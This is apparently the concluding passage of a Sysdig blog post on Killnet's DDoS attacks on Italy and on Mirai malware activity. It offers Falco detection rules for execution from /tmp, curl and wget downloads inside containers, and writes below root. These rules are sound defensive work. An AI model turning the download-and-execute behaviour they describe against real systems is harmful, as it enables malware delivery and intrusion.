  • May 17 at 4:06 CET – Killnet claimed another DDoS attack against the website of the Italian State Police. They added that ‘A full-scale Cyber ​​War has been going on for more than a day, we cannot publish 90% of our work. All the funniest moments will still pop up in the media, and here on the channel.
Killnet polizia italian

What we found about Mirai

The Sysdig Threat Research Team collected and monitored data about the Mirai group and similar Mirai malware for some time. During the last year, Mirai has always been active when we see it. In particular, in the last 90 days, we monitored more than 1,000 attacks from different types of malwares based on Mirai.

Diagram Mirai behavior

From the data collected, we can see a spike in Mirai attacks from the end of February till now. As we know, the conflict in Ukraine started on Feb. 24, as marked in the screen above. The correlation between these two events is likely and supported by a lot of information on DDoS attacks performed during these months.

Using the data collected, The Sysdig Threat Research team designed new detection rules to address the malicious behaviors related to malwares to provide better detection using Falco.

Detecting Mirai using Falco

The following rules have proven to be useful in detecting the activities of similar Mirai malwares:

- rule: Execution from /tmp
desc: This rule detects file execution from the /tmp directory, a
common tactic for threat actors to stash their
readable+writable+executable files.
condition: spawned_process and ((proc.exe startswith "/tmp/" or
(proc.cwd startswith "/tmp/" and proc.exe startswith "./" )) or
(proc.cwd startswith "/tmp/" and proc.args contains "./"))
output: "File execution detected from /tmp
(proc.cmdline=%proc.cmdline)"
priority: WARNING
tags: [mitre_execution]
-  macro: curl_download
condition: proc.name = curl and
(proc.cmdline contains " -o " or
proc.cmdline contains " --output " or
proc.cmdline contains " -O " or
proc.cmdline contains " --remote-name ")

- rule: Launch Ingress Remote File Copy Tools in Container
desc: Detect ingress remote file copy tools launched in container
condition: >
spawned_process and
container and
(proc.name = wget or curl_download) and
not user_known_ingress_remote_file_copy_activities
output: >
Ingress remote file copy tool launched in container
(user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline
parent_process=%proc.pname container_id=%container.id
container_name=%container.name
image=%container.image.repository:%container.image.tag)
priority: NOTICE
tags: [network, process, mitre_command_and_control]
- rule: Write below root
desc: an attempt to write to any file directly below / or /root
condition: |
root_dir and evt.dir = < and open_write and proc_name_exists and
not exe_running_docker_save and not zap_writing_state and not
maven_writing_groovy and not kubectl_writing_state and not
cassandra_writing_state and not calico_writing_state and not
rancher_writing_root and not runc_writing_exec_fifo and not
user_known_write_root_conditions and not
user_known_write_below_root_activities
output: File below / or /root opened for writing (user=%user.name
user_loginuid=%user.loginuid command=%proc.cmdline parent=%proc.pname
file=%fd.name program=%proc.name container_id=%container.id
image=%container.image.repository)
priority: ERROR
tags:
- mitre_persistence

Reference for “Write below root” where the full definition can be found: https://github.com/falcosecurity/falco/blob/master/rules/falco_rules.yaml#L1332

To avoid false positives, you can add exceptions in the condition to better adapt to your environment.

Conclusion

The kinds of cyber attacks that we’ve seen recently are not new techniques. What is new is the fact that these attacks were brought about by the political context of the current war between Russia and Ukraine.

The fact that those attacks managed to disrupt the network services of institutional servers implies that the Italian government and other institutions are not adequately prepared for these attacks, which can become increasingly impactful if we don’t manage to reinforce our web infrastructures.

However, we are far from calling it a cyber war. It’s not necessary to overstate the terms we use to describe those events. Instead, it’s important to create awareness of cyber-security through consistent and truthful information. Indeed, the communication part should not be underestimated.

Misinformation contributes to weakening our infrastructures from future attacks. Transparent communication of the incidents from the parties involved would help increase the general awareness about cyber attacks, and that is fundamental to preventing them.

The post Killnet cyber attacks against Italy and NATO countries appeared first on Sysdig.

]]>